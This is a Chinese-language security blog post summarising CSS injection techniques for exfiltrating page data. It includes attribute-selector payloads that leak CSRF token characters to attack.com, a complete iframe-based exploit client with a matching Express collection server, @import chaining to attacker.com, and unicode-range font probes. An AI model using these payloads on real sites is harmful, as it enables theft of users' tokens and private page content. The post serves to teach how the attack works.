CSS injection 总结

admin 2021年5月10日01:26:51评论86 views2字数 6753阅读22分30秒阅读模式

现代浏览器都已不允许在CSS中执行JavaScript了,以前的CSS注入可以利用JavaScript协议在url()expression()中执行Javascript代码从而实现XSS。但是目前CSS注入在窃取数据方面仍然是非常有用的,下面分别来分析一下。

CSS 注入 窃取标签属性数据

CSS中可以使用属性选择器,根据不同的属性选择标签。比如下面CSS选择含有a属性且其值为abc的p标签。

html
<style>p[a="abc"]{ color: red;}</style>
<p a="abc">hello world</p>

属性选择器还可以匹配值的一些特性,比如以XXX开头、以XXX结尾等。

CSS injection  总结

利用上面的性质我们可以用来窃取页面标签属性中的数据。比如下面当csrfToken以某个字母开头时,就可以通过url()通知攻击者,从而窃取csrfToken的第一位的值。

```html

input[value^="0"] {
background: url(http://attack.com/0);
}
input[value^="1"] {
background: url(http://attack.com/1);
}
input[value^="2"] {
background: url(http://attack.com/2);
}
...
input[value^="Y"] {
background: url(http://attack.com/Y);
}
input[value^="Z"] {
background: url(http://attack.com/Z);
}

```

第一位是Z,接着窃取第二位

html
<style>
input[value^="Z0"] {
background: url(http://attack.com/0);
}
...
input[value^="ZZ"] {
background: url(http://attack.com/Z);
}
</style>
<input name="csrfToken" value="ZTU1MzE1YjRiZGQMRmNjYwMTAzYjk4YjhjNGI0ZA==">

解决hidden

当然还有个问题, 当标签type=hidden 时浏览器是不允许我们设置background的,这样就无法触发url()请求服务器。

解决方法之一是利用~CSS的兄弟选择器,选择为后续所有兄弟节点设置background。

css
input[value^="Z"] ~*{
background: url(http://attack.com/Z);
}

批量实现

当然,如果位数比较短且可能性比较少我们可以将其所有都列出来,但是通常都太多了,所以我们需要利用技巧批量得到。

假设目标存在css注入的网站为如下, 目标是窃取input标签中的csrfToken值。

php
<!DOCTYPE html>
<html>
<head>
<title>CSS injection</title>
</head>
<body>
<input type=hidden name="csrfToken" value=<?=md5(date("h"))?>>
<input type="" name="">
<style><?php echo $_GET['css']?></style>
</body>
</html>

有iframe

当存在CSS注入的网站响应头未被X-Frame-Options保护时, 我们可以创建一个恶意的页面,利用js创建iframe包含该漏洞网站,利用css注入获得一位csrfToken值后通过url()提交给服务器,服务器指示前端js继续创建iframe窃取第二位值,继续上面的操作,直到全部读取完。当然这要求每次请求漏洞网站内容都不会变。

这里存在一个问题,服务器如何指示前端js构造css,就像我们上面举得例子窃取到第一位为Z, 那么第二位的payload应该是Z开头的。

下面的payload 来自这里 https://medium.com/bugbountywriteup/exfiltration-via-css-injection-4e999f63097d

它的思路是前端js使用setTimeout定时请求服务器,服务器将css注入得到的token返回。

```html

#frames {
visibility: hidden;
}

vuln_url = 'http://127.0.0.1:8084/vuln.php?css=';
server_receive_token_url = 'http://127.0.0.1:8083/receive/';
server_return_token_url = 'http://127.0.0.1:8083/return';

    chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".split("");
    known = "";

    function test_char(known, chars) {
        // Remove all the frames
        document.getElementById("frames").innerHTML = "";

        // Append the chars with the known chars
        css = build_css(chars.map(v => known + v));

        // Create an iframe to try the attack. If `X-Frame-Options` is blocking this you could use a new tab...
        frame = document.createElement("iframe");
        frame.src = vuln_url + css;
        frame.style="visibility: hidden;"; //gotta be sneaky sneaky like
        document.getElementById("frames").appendChild(frame);

        // in 1 seconds, after the iframe loads, check to see if we got a response yet
        setTimeout(function() {
            var oReq = new XMLHttpRequest();
            oReq.addEventListener("load", known_listener);
            oReq.open("GET", server_return_token_url);
            oReq.send();
        }, 1000);
    }

    function build_css(values) {
        css_payload = "";
        for(var value in values) {
            css_payload += "input[value^=""
                + values[value]
                + ""]~*{background-image:url(" 
                + server_receive_token_url
                + values[value]
                + ")%3B}"; //can't use an actual semicolon because that has a meaning in a url
        }
        return css_payload;
    }

    function known_listener () {
        document.getElementById("current").innerHTML = "Current Token: " + this.responseText;
        if(known != this.responseText) {
            known = this.responseText;
            test_char(known, chars);
        } else {
            known = this.responseText;
            alert("CSRF token is: " + known);
        }
    }

    test_char("", chars);
</script>

```

服务器代码是我配合它的payload写得。

```javascript
var express = require('express');
var app = express();
var path = require('path');
var token = "";

app.get('/receive/:token', function(req, res) {
token = req.params.token;
console.log(token)
res.send('ok');
});

app.get('/return', function(req, res){
res.send(token);
});

app.get('/client.html', function(req, res){
res.sendFile(path.join(__dirname, 'client.html'));
})

var server = app.listen(8083, function() {
var host = server.address().address
var port = server.address().port
console.log("Example app listening at http://%s:%s", host, port)
})
```

还有师傅通过服务器将token写入到cookie中, 定时查询cookie是否改变来实现的。

还发现有师傅用websocket实现更优雅一些。 https://gist.github.com/cgvwzq/f7c55222fbde44fc686b17f745d0e1aa

无 iframe

https://github.com/dxa4481/cssInjection 这里介绍了一种无iframe注入的方法。

原理也很简单,既然不能用iframe引入漏洞页面,那么我们可以通过window.open不断开启一个新的窗口,也就可以完成上述类似的效果。当然这种方法得劫持用户的点击行为,否则浏览器会禁止开启新窗口。

而且这篇文章还提出了无后台服务器的方案,利用service workers 拦截客户端请求将获取到的token值同时存在本地localstorage中。

@import

利用@import在chrome中的特性,https://medium.com/@d0nut/better-exfiltration-via-html-injection-31c72a2dae8b 这篇文章提出的这种方法。这种方法有种好处就是不会刷新页面就可以拿到全部token而且不需要iframe,但坏处就是只能用在chrome中,而且根据它的特性必须在样式标签头部有注入才行。

除了常见的<link>标签引入外部样式,css还可以通过@import

@import url(http://style.com/css.css);

但是@import必须在样式表头部最先声明,并且分号是必须的。@import引入的样式表会直接替换对应的内联样式。

chrome在实现上述效果时,在每次@import外部样式表返回后都重新计算了一遍页面的其他的样式表,我们可以利用这个特性嵌套@import 使用一个请求便获取到整个token

这是他文章中的一个图,很形象。

CSS injection  总结

CSS injection  总结

这图假定要窃取的数据长度为3,第一次注入的css内容为@import url(http://attacker.com/staging);,它返回了

@import url(http://attacker.com/polling?len=0);
@import url(http://attacker.com/polling?len=1);
@import url(http://attacker.com/polling?len=2);

这时页面又要获取@import url(http://attacker.com/polling?len=0);样式表,而它返回的是窃取token的payload。

当将已窃取数据发送到服务器后,@import url(http://attacker.com/polling?len=1);才会响应。响应的是窃取的第二位数据的payload....

而且那篇文章还开源了一个工具利用这个漏洞,用起来非常简单。

https://github.com/d0nutptr/sic

窃取标签content数据

窃取标签content数据相对来说就麻烦很多,去年xctf final就有一道题。

利用 unicode-range 猜测

根据https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html这位师傅的思路,可以通过指定@font-face的字体描述unicode-range,当存在某个字符时就通知服务器。

```html

@font-face{
font-family:poc;
src: url(http://attacker.example.com/?A); / fetched /
unicode-range:U+0041;
}
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?B); / fetched too /
unicode-range:U+0042;
}
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?C); / not fetched /
unicode-range:U+0043;
}

sensitive-information{

font-family:poc;
}

AB

```

当然这只能知道含有那些字符,而且当字符一多就没有意义了。不过这也是个不错的思路,在某些特定情况下可能有用。

利用连字(Ligature)

去年xctf师傅们的题解用的就是这个方法。

连字简而言之就是几个字符的合体字,更多自行百度。在这里我们可以自己创建一个字体,其中所有字符宽度设为0,将flag这个连字的宽度设置非常大,此时指定标签content中如果出现了flag字符串就会因为宽度的原因出现滚动条,检测出现滚动条时用url()请求服务器。

这样我们就可以不断向后猜测了,详细的创建字体、payload这里已经提供了。

参考

https://medium.com/bugbountywriteup/exfiltration-via-css-injection-4e999f63097d

https://medium.com/@d0nut/better-exfiltration-via-html-injection-31c72a2dae8b

https://github.com/dxa4481/cssInjection

https://xz.aliyun.com/t/6655#toc-5

What can we do with single CSS injection? from Slackers

https://x-c3ll.github.io/posts/CSS-Injection-Primitives/

https://www.smi1e.top/%e9%80%9a%e8%bf%87css%e6%b3%a8%e5%85%a5%e7%aa%83%e5%8f%96html%e4%b8%ad%e7%9a%84%e6%95%b0%e6%8d%ae/

https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html

https://www.w3school.com.cn/css/css_selector_attribute.asp

https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/

https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense

相关推荐: 潜藏在PHP安全的边缘——浅谈PHP反序列化漏洞

潜藏在PHP安全的边缘——浅谈PHP反序列化漏洞 注意事项: 1.本篇文章由复眼小组的瞳话原创,未经允许禁止转载 2.本文一共1376字,8张图,预计阅读时间6分钟 3.本文比较基础,请大佬酌情观看,如果有其他的骚思路,欢迎和我们交流 0x00.前言 最近在研…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月10日01:26:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CSS injection 总结https://cn-sec.com/archives/246381.html